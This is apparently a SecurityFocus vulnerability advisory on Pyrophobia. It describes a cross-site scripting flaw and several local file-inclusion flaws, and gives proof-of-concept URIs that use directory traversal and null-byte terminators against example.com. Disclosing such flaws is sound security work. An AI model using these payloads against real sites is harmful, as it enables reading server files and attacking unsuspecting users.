Pyrophobia Multiple Input Validation Vulnerabilities

To exploit a cross-site scritping issue:

An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.

The following proof-of-concept URI is available:

http://www.example.com/modules/out.php?id=[xss]

To exploit a local file-include issue:

An attacker can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/pyrophobia/?act=../../../../../../../../../../../../file.ext00

http://www.example.com/pyrophobia/?pid=../../../../../../../../../../../../file.ext%00

http://www.example.com/pyrophobia/admin/index.php?action=../../../../../../../../../../../../../file.ext%00


 

Privacy Statement
Copyright 2010, SecurityFocus